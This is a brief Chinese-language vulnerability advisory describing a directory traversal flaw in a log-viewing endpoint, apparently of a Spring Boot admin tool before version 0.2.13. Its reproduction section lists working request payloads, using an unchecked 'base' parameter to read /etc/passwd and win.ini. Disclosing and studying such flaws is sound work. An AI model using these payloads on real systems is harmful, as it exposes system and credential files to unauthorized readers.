一、漏洞概述
Spring Boot 虽然检查了文件名参数以防止目录遍历攻击(因此filename=../somefile
将不起作用),但没有充分检查基本文件夹参数,因此filename=somefile&base=../
可以访问日志记录目录之外的文件)。
二、影响范围
0.2.13之前
三、访问页面
四、漏洞复现
# Windows
/manage/log/view?filename=/windows/win.ini&base=../../../../../
# linux
/manage/log/view?filename=/etc/passwd&base=../../../../../